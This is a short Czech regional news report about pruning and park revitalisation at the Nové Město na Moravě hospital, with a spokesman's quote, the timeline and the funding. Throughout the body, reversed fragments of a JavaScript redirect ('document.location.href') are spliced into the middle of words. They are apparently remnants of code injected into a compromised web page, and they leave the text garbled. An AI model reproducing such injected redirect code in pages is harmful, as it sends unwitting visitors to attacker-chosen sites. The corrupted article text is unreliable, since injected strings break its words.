Rainbow page separator

V nemocničním parku prořezávají stromy

Pátek, 27. února 2015

Prořezávka stromů v Nemocnici Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Prořezávkou stromů pokračuje v těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dnech v areálu novoměstské nemocnice revitalizace parku. „Prosíme návštěvníky nemocnice, aby v zájmu bezpečnosti respek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali případná omezení,“ informoval mluvčí novoměstské nemocnice Roman Kra[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tochvíl.
Revitalizace nemocničního parku má minimálně na další dvě desítky let ošetřit a zkvalitnit tamní zeleň a navíc areálu dá jednotný architek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonický ráz. Práce začaly loni na podzim, dokončeny mají být le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos v červenci. Na jaře budou například ještě založeny nové trávníky na téměř 3,5 hektarech plochy v celém areálu zdravotnického zařízení.
Revitalizace zeleně v nemocnici vyjde celkem na 2,5 milionu korun, pětasedmdesát procent poskytne evropský fond a Státní fond životního prostředí.